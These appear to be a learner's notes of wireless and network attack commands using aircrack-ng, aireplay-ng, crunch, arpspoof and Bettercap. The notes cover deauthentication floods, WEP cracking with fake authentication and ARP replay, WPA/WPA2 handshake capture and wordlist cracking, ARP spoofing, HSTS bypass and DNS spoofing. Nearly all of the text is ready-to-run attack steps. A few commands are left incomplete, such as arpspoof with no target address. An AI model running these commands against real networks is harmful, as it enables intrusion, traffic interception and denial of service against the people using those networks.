To list all network interfaces available, we can use
. The MAC address can be viewed under ether in wlan0 and the IP can be viewed under inet in eth0. -
To change the MAC address:
ifconfig wlan0 down #disables wlan0
ifconfig wlan0 hw ether 00:11:22:33:44:55 #sets hardware address of wlan0
ifconfig wlan0 up #enables wlan0
To list only wireless interfaces, we can use
. -
To change wlan0 to monitor mode:
ifconfig wlan0 down
airmon-ng check kill #optional; kills any process that disturb interface in monitor mode
iwconfig wlan0 mode monitor #changes wlan0 mode to monitor
ifconfig wlan0 up
- To sniff packets, we can use airodump-ng:
airodump-ng wlan0 #here, wlan0 must be in monitor mode in order to fetch details
- To sniff packets on particular wifi bands:
airodump-ng --band a wlan0 #captures all networks with 5 GHz band
airodump-ng --band abg wlan0 #captures 2.5 GHz and 5 GHz networks at the same time
- To do targeted packet sniffing:
airodump-ng --bssid 54:37:BB:B5:BB:09 --channel 4 --write testfile wlan0 #captures a particular network with given bssid and channel number, then it saves data to a file called testfile
#this will also show the devices connected to network
- To run a deauthentication attack, which can disconnect any client from any network:
aireplay-ng --deauth 100000000 -a 54:37:BB:B5:BB:09 -c 70:BB:E9:7B:AE:D2 wlan0
#here, aireplay-ng is the program name, followed by the deauth attack specifications including the MAC address of target router (-a) and MAC address of target client (-c)
WEP(Wired Equivalent Privacy) can be cracked using two tools: airodump-ng and aircrack-ng.
To crack into a busy WEP network:
airodump-ng --bssid 54:37:BB:B5:BB:09 --channel 4 --write wep_test wlan0
#capturing data packets from WEP network and writing it into a file
aircrack-ng wep_test-01.cap
#analyze captured data, cracks the key and prints it
- To crack into a non-busy WEP network, we need to do a fake authentication attack:
airodump-ng --bssid 54:37:BB:B5:BB:09 --channel 11 --write arpreplay wlan0
aireplay-ng --fakeauth 0 -a 70:BB:E9:7B:AE:D2 -h 1A:AB:2E:49:AA:AD wlan0
#to associate with network; uses aireplay-ng tool to run a fake authentication attack on given MAC address access point (-a) and by wireless adapter having monitor mode(-h).
aireplay-ng --arpreplay -b 70:BB:E9:7B:AE:D2 -h 1A:AB:2E:49:AA:AD wlan0
#ARP request replay; forces access point to generate new IVs
aircrack-ng arpreplay-01.cap
- To crack WPA/WPA2:
airodump-ng --bssid 54:37:BB:B5:BB:09 --channel 3 --write wpa-handshake wlan0
#capture handshake (when client joins network)
#deauth attack can be done in parallel to capture handshake
aireplay-ng --deauth 4 -a 54:37:BB:B5:BB:09 -c 70:BB:E9:7B:AE:D2 wlan0
#After this handshake is captured and stored in file
crunch 6 8 ria258 -o trial-wordlist.txt
#wordlist created using crunch with specifics
aircrack-ng wpa-handshake-01.cap -w trial-wordlist.txt
- For devices connected on same network:
netdiscover -r #search devices on same subnet as Kali
netdiscover -c 10 -r -i eth0 #increases no. of packets
- zenmap (GUI for nmap) can be used to gather more data about devices within subnet range.
- ARP Spoofing using arpspoof:
arp -a #to view arp table, works on both Linux and Windows
arpspoof -i eth0 -t #arpspoof target victim (Windows VM) through gateway
arpspoof -i eth0 -t #arpspoof target router (gateway) through victim
#both arpspoof commands required to be run simultaneously
#result can be observed by viewing changed MAC address using 'arp -a' on victim PC
echo 1 > /proc/sys/net/ipv4/ip_forward #enable port forwarding
- ARP Spoofing using Bettercap:
bettercap -iface eth0 #initialize
net.probe on #net probing, gives list of connected IPs
net.show #list of connected clients
#'help' can be used to view modules
set arp.spoof.fullduplex true
set arp.spoof.targets #change parameter values
arp.spoof on #start arp spoofer
net.sniff on #sniff packets
#.cap files can be created to run custom scripts to save time
bettercap -iface eth0 -caplet spoof.cap
HTTPS and HSTS can be bypasses using caplets from Bettercap, such as hstshijack.
DNS Spoofing:
service apache2 start #start web server
bettercap -iface eth0 -caplet spoof.cap
set dns.spoof.all true
set dns.spoof.domains zsecurity.org, *.zsecurity.org
dns.spoof on
#by default, it will redirect to interface address (
- Wireshark can be used to analyze packets sniffed using MITM attacks.